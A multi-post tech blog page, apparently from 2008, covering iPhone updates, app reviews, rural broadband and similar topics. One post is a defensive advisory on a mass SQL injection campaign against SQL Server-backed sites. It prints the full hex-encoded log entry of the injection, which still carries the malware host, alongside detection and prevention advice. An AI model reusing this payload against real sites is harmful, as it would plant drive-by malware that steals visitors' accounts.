Boy Genius says iPhone software v2.0.2 is on it's way out the door this afternoon. In fact, I just checked in iTunes, and there it is.

All 248.7MB of it. The description in the iTunes UI says it contains bug fixes, and that's it. Here's hoping the performance and stability issues - especially related to 3G network performance and switching - are what they fixed in this release. I almost returned my phone the other day out of sheer frustration, and that's saying a lot, really.

Update: After a couple hours of on/off use, apps are notably more stable/snappier (at first I wondered if it was just my imagination, or a fresh restart effect - time will tell), and network performance is better. Where a 3G network with poor or broken signal would be selected before, now a strong EDGE network is selected by the phone. Apps don't seem to hang in places where they reliably (or maybe the better term would be "predictably") hung before the update. For example, the volume controls in almost every app used to not respond for periods of time. Now they work every time. Much less frustrating. There are no real changes in terms of ourward appearance and functionality.

I just made a change on the blog, so my main RSS feed links now point to FeedBurner. You should not need to do anything to use the new feed - it's automagical. As a result of this change, some people might see duplicates of past entries. It's a one-time change (I hope), so thanks for putting up with it.

If you happen to subscribe to the feed for any single posting category here, that feed URL is unchanged.

My knowledge and social integrity was called into question this evening (in an instant messaging group chat session) about a rule-related fact I declared to be true based on the Rules of Jinx. I've always considered the rules to be pretty straight forward, and we all know they are unflinchingly rigid, but I'm willing to accept that evidence is the best proof when someone questions you.

And what better evidence than an encyclopedia of "facts" made up by pretty much anyone who says they know what they're talking about? I went to Wikipedia, and the entry there about the rules of Jinx. I'm posting a portion of it here for easy future reference.

A jinx can be initiated when at least two people in casual conversation unintentionally say (or type, in the case of Internet jinx) the same word or phrase at the same time. If one of them (the "jinxer") yells "Jinx!" before any further conversation has begun, the other person (the "jinxee") is in a state of being "jinxed" and may not speak further until they are "released" from the jinx. The rules for what constitutes such a release vary. Traditionally, a jinx is ended when anyone speaks the jinxed person's name. However, a common variation says that only the jinxer can free the jinxee from their obligation to remain silent. (This is sometimes called a "private jinx" or "jinx personal lock".)

The game ends when either the jinxee is released from the jinx or when the jinxee "breaks" the jinx by speaking while in a state of being jinxed. In the latter case, the Jinxee loses the game and a penalty is exacted.

Simultaneous speaking that is planned or expected, such as during the recitation of the Pledge of Allegiance or during the singing of a song, is ineligible for a jinx to occur. A jinx may only follow a spontaneous and unexpected overlapping of conversation by both parties.

See the wikipedia article for penalties, variations and details about the Jinx Sequence.

Okay. Back to your regularly scheduled programming, already in progress...

A bunch of IT and web-app teams have lost a lot of sleep lately...

Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).

The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).

Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked, the only common thread is SQL server (despite reports to the contrary).

About data validation...

I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default, it's the only safe way to go.

UPDATE: Neil Carpenter mentions in the comments here that he recently posted an excellent blog entry about using parametrized queries in SQL server, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered conbination of both input validation (where it's practical and workable) and paramaterized queries is a good approach, in my opinion.

The attack

Secure Computing's TrustedSource (good site, read it) has some detail about the attack...

You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):

GET /?';DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>

To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least what's where I have seen them coming from).

How to solve?

First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best-practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off javascript and manipulating data en-route to the server is pretty easy, after all).

If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. In addition, you could use application-layer firewalls in from of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.

HP recently released a tool that you can use to check for SQL injection vulnerabilities specifically called Scrawlr. You can find it, and related information, here.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences.

There are a lot of so-so iPhone apps out there, fun to use once or twice but not killer applications that you simply must have. DataCase is a candidate for that latter classification. (Available via the app store for iPhone and iPod Touch, $6.99)

The DataCase app allows you to copy files from your PC or Mac to the iPhone via the wireless network using a drag-and-drop method. Once on the iPhone you can view and use the files in mobile mode. There's support for MS Office formats, PDF, text, common images, HTML, plus any audio and video the iPhone OS would normally support.

It's pretty slick. I'm playing with it now and can see the real benefits of having a variety of key files, documents, etc. available on the mobile device any time I need them. One problem common to all iPhone apps is the fact that it has to be running in the foreground in order to access the app remotely - no background execution. Good thing I bought this 16GB iPhone eh?

Links: Veiosoft web site and a review at TUAW.

I'm a rural-living person who often consults people on how to get broadband Internet connectivity to their middle-of-nowhere homes. There's some good news for most of those people. HughesNet, the big guy in the satellite Internet service space operated by Hughes Network systems (no relation), has announced that later this month they will begin offering what they're calling the ElitePremium plan, with download speeds available as fast as 5 megabits per second (mbps). That's up there speed-wise with what many cable companies provide, and is easily a competitor to DSL speed capabilities. It'll be available to order on August 21st.

Satellite Internet has some inherent latency between the time a request is sent and the resulting data is fed to you, since the distance the signal travels, even at the speed of light, is pretty darned far. Many VPN systems have a difficult time on Satellite, also due to the time-shift latency. But the "start" delay is not huge, and once the "faucet is open," 5 mbps is pretty darned fast.

That's about five times the download speed I get on my Internet connection, which is an excellent terrestrial wireless offering from a local provider (which is Cascade Networks, if you happen to live in the Longview, Washington or Columbia County, Oregon areas). An antenna on my roof points at a tower on a mountain about 11 miles away, and that's the option I use.

So, more options and much faster speeds for us non-city-dwellers. Not a bad deal!

Every now and then you'll discover a couple or few smaller apps that work well together, or alongside each other. The type of situation where you get the 2+2=5 effect. Individually both apps are great, but when used together they becomes something even more. "Two great tastes that taste great together," to borrow an old marketing phrase.

That's been the case for me with two iPhone apps - Shazam (iTunes store page) and Pandora (iTunes store page). Today I use them alongside each other. It's my hope that someday they will be able to communicate with each other and share information.

I've written about Pandora here before. It's a web app that happens to have an iPhone client as well, where you can start with music you like and it helps you find more music that fits your taste and style. You create channels, or stations, and the Pandora service selects similar music for your to hear, and you can fine tune as you go.

Shazam is another of those magical "wow" apps for the iPhone. I use it in the car when I hear a song I like. Rarely do I know the name of the song, or even the artist. But as it plays, I just tell Shazam to listen to a 12-second portion of the song (a process called "tagging"). It uploads the resulting data to the centralized service, and back comes all the information about the song - Artist, title, album, everything. It's really amazing, and in my experience 100% accurate. From there you can also find YouTube videos and launch into the iTunes store to buy the music you've tagged.

I'll often take the name of an artist I discover from Shazam and plug the info into Pandora and start listening there. It's a great way to quickly and relatively effortlessly drill down into new music I have never heard before, but it's music that I really like.

Now imagine if you could use Shazam to identify a song and then inside Shazam choose an option to create a channel based on that artist in Pandora. That would be awesome, truly awesome. I have no idea how "possible" it is, but I can hope. :)

On a similar note - meaning various apps that work great together - ReadWriteWeb published an article this past week with a list of apps that complement each other well (including my Shazam/Pandora combination).

My title for this post sort of spins the title of the article I want to point you to, aiming for the positive side of the coin. The article, which is entitled "The Top 5 Reasons Tech Execs Fail," provides a set of bullet-pointed thoughts that can be read as a list of what tech execs need to do in order to succeed. I happen to agree with the authors' assessment.

Here's the short version of Marty Abbott and Michael Fisher's five points, slightly altered to read as a list of positive attributes of a successful tech leader:

5. Ability to Build World Class Team
4. Ability to Execute
3. Ability to Lead/Motivate/Inspire
2. Ability to Manage Operationally
1. Displays and Uses Financial Acumen

The authors point out in their article, "... when technology executives fail, it is not because they lack an individual skill. It is because they lack an an adequate balance of the many technical, operational and leadership skills necessary to make them a complete manager."

You should listen to your online friends. They often have great ideas, like in this case. I was recently turned onto a simple but effective alternative to bulky plastic cases and leather holsters for my new iPhone 3G. It's called the invisible SHIELD . The product, simply put, is pretty darned terrific. You hardly know it's there, and it protects like crazy. You can also get invisibleSHIELD for the iPhone first-generation device.

Now, let me tell you right up front that when it comes time to "install" the shield on your phone, you'll need a clean work surface, a little patience, 12 to 24 hours to let your shield "cure" on the phone,  and the ability to read and follow some simple instructions. If you make sure you have those few key things taken care of, all will go well.

In the video below I show and abuse my iPhone 3G (the only one I own...) with an Invisible Shield installed. In the video you can see that there are a couple scratches under the shield. Those came from a combination of iPhone and the keys in my pocket (before I ordered the invisibleSHIELD . In fact it was those exact scratches, which I got the first day I had the phone, that prompted me to find a real, working anti-scratching solution.



I can highly recommend the Invisible Shield.

Full disclosure: Zagg (the manufacturer of the invisibleSHIELD ) doesn't know I am doing this review. I found their product all on my own based on a real need, and clicking on the advertisement below takes you to my link on their product site - If you buy something there I'll get a small chunk of the change you spend. If you don't like that idea, no problem - just go to zagg.com and click through to the iPhone 3G page (or whatever product you want to cover and protect - For me, my MacBook Air is next).

  

I especially appreciated the Mojave Experiment that Microsoft recently shared with the world (where Vista-negative opinions were tested with a "new" version of Windows, code-named Mojave; it was then revealed to the participants after seeing the new version that what they were looking at was actually Vista). I've been using Vista since well before I came onto the market, and I can hardly stand to use WIndows XP computers anymore. Anyhow, check out http://www.mojaveexperiment.com if you haven't seen it, especially if you have a negative opinion of Vista today based on what you've heard from others. (Note: Scientifically speaking, the "experiment" would be badly flawed, but it's a marketing campaign and in that light it's pretty darned smart if you ask me. Plus, I've lost track of how may people who, never having seen Vista yet having a negative perception, decided to upgrade after trying for a couple hours (on my laptop) at my suggestion. With SP1 installed, for the record. Seriously, group think and manipulation goes both directions).

For those of us who are using Vista (or any other OS for that matter), it's nice to be able to fine-tune a computer system so it will perform the way we want it to. For Vista, Microsoft has released a document called Windows Vista Performance and Tuning as part of their Springboard series, which lets users know about a number of tweaks and decisions they can make to make the OS work well for their needs. It also effectively spells out in fairly plain language some relatively complex information.

Windows Vista and SP1 focus on delivering greater performance and overall system responsiveness. By striking a balance between speed and responsiveness, Windows Vista and SP1 deliver a level of performance that has the greatest positive impact on the system’s usability.This guide looks at the following areas of performance improvement:

• Making configuration changes that help a computer feel more responsive when you use it.
• Using hardware to boost the actual physical speed of a computer.
• Making configuration changes that help a computer to start faster.
• Making the computer more reliable may help increase performance.
• Monitoring performance occasionally so that you can stop problems before they get too big.

There are a variety of other guides out there as well, but this one hits a number of important nails on the head that the average computer user can easily understand and use.

Last week we published an interview that Richard and I did on RunAs Radio with my friend and former co-worker, Simon Goldstein. Simon's a real pro and is good at explaining complicated business relationships and processes.

We cover risk management for IT professionals: What is it, what do you need to know, and why does it matter? As with all of our weekly RunAs Radio shows, it's about 30 minutes long and we cover a lot of ground in that time.

RunAs Radio, Show 67 - Simon Goldstein on IT Risk Management (38 minutes)

Note: You can find all our podcast feeds in the table here, and you can also subscribe to get the show every week in iTunes by clicking here.

Over on the Internet Evolution site I recently wrote an article discussing the fact that MySpace is becoming an OpenID provider. Of note is the fact that they will be provider-only, and not a relying party, at least initially. This is a trend we've seen with other big companies like Yahoo!, and many of us are not-too-patiently waiting for these companies to start trusting and relying upon other organizations, so the utopia of user-controlled Internet single-sign-on can become a reality.

That begs the question, "What will it take to achieve the level of trust and confidence needed to make it easy for these big provider companies to join the relying-party crowd?" I'm certain there are plenty of detailed conversations and that things are being hammered out and actively discussed behind the scenes at all these major companies, but I tend to think about these things out loud anyhow.

So, I hope you'll read my article and thoughts over on Internet Evolution and that you'll take advantage of the opportunity to comment there. I'd be interested to know what you think.

The DNS vulnerability discovered earlier this year by Dan Kaminsky, and recently patched by DNS software providers in an unprecedented cross-vendor cooperation, has graduated from vulnerability to exploit-in-the-wild.

According to Kaminsky, 52% of the DNS servers on the Internet are still vulnerable, better than the number of exploitable systems just a few weeks ago when the patches were released by all the vendors.

Kaminsky has written up a plain-language helper guide to explain the problem to non-technical (read: management and decision-making) people. There's also a Black Hat webcast with Kaminsky available where he details the vulnerability and discusses the fixes.

Read more at Ars Technica.

On the Google blog, Jesse Alpert & Nissan Hajaj posted an article today called "We knew the web was big..." which indicates Google engineers recently noted that the number of web pages on the Internet passed the one-trillion mark. That's 1,000,000,000,000 pages. For those who don't process the impact of adding that many groups of zeros at a time, think about this:

• Take 1,000 pages.
• Multiply that 1,000 times and think about just how big that is.
• Multiply that amount another thousand times, and stop to think about how big that is.
• Now, again take that huge amount and multiply it by 1,000. Now you're at a trillion pages.

That's freakin' huge, really. If you started counting from one to a trillion and counted one number per second, it would take you almost 317 centuries before you were done (and by the way I asked google to help me figure that out). That's almost 32,000 years. It almost completely boggles the mind. That's a lot of web pages.

Google also notes that every day, the number of pages on the web increases by several billion.

Alpert and Hajaj have another explanation to try to explain the sheer size of the Internet today:

Today, Google downloads the web continuously, collecting updated page information and re-processing the entire web-link graph several times per day. This graph of one trillion URLs is similar to a map made up of one trillion intersections. So multiple times every day, we do the computational equivalent of fully exploring every intersection of every road in the United States. Except it'd be a map about 50,000 times as big as the U.S., with 50,000 times as many roads and intersections.

That's really just amazing to me. Wow. And now you know why we call this the Information Age. A lot of that information may be inaccurate, pornographic or otherwise useless, but some of it's good, and the sheer immensity of it is truly awesome.

TechCrunch has a slightly different take, calling the Google post misleading. The end of the TechCrunch post alludes to some news coming next week that might turn Internet indexing on it's head. Interesting - Is there some big search engine news in the works? Is it Microsoft's BrowseRank or something else? Stay tuned.

Apple has released a version of the iPhone 2 software (v2.1) to beta programmers along with an updated SDK. The firmware release supposedly includes additional core GPS features that allow computation and use of direction of travel and speed. This is good for those of us waiting patiently for turn-by-turn direction software for the phone.

Apparently there's also some functionality that enables apps to process push notifications in the background, as well. I, for one, hope for more background processing capabilities in general in the app arena. Would be nice to have Pandora keep playing music when exiting, or not to have to reload any of several twitter clients every time I click a Safari link and want to go back.

Read the story at Mac Rumors and Gear Live.